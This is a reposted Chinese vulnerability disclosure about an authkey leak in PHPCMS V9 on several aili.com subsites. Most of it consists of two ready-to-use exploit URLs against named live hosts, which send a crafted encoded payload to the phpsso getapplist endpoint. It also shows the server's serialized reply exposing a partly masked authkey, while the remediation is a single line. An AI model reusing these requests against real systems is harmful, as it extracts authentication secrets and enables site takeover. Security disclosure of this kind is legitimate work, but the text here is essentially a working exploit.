欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

爱丽网多个分站phpcmsV9 authkey泄露漏洞(集合)

程序员文章站 2022-04-02 10:20:02
爱丽网多个分站phpcmsV9 authkey泄露漏洞(集合) 重新检测了,还有几个站受影响 WooYun: PHPCMS V9 一个为所欲为的漏洞   ht...

爱丽网多个分站phpcmsV9 authkey泄露漏洞(集合)

重新检测了,还有几个站受影响

WooYun: PHPCMS V9 一个为所欲为的漏洞


 

http://hzp.aili.com//phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=e5c2VAMGUQZRAQkIUQQKVwFUAgICVgAIAldVBQFDDQVcV0MUQGkAQxVZZlMEGA9+DjZoK1AHRmUwBGcOXW5UDgQhJDxaeQVnGAdxVRcKQ


 

http://brand.aili.com//phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=e5c2VAMGUQZRAQkIUQQKVwFUAgICVgAIAldVBQFDDQVcV0MUQGkAQxVZZlMEGA9+DjZoK1AHRmUwBGcOXW5UDgQhJDxaeQVnGAdxVRcKQ


 

 

a:1:{i:2;a:9:{s:5:"appid";s:1:"2";s:4:"type";s:9:"phpcms_v9";s:4:"name";s:7:"product";s:3:"url";s:24:"http://product.cvc8.com/";s:7:"authkey";s:32:"7onsikbx7dwg1u420t*******niziqox";s:2:"ip";s:0:"";s:11:"apifilename";s:17:"api.php?op=phpsso";s:7:"charset";s:5:"utf-8";s:8:"synlogin";s:1:"1";}}


 

a:1:{i:2;a:9:{s:5:"appid";s:1:"2";s:4:"type";s:9:"phpcms_v9";s:4:"name";s:7:"product";s:3:"url";s:24:"http://product.cvc8.com/";s:7:"authkey";s:32:"7onsikbx7dwg1u4*******07niziqox";s:2:"ip";s:0:"";s:11:"apifilename";s:17:"api.php?op=phpsso";s:7:"charset";s:5:"utf-8";s:8:"synlogin";s:1:"1";}}

 

解决方案:

一并更新系统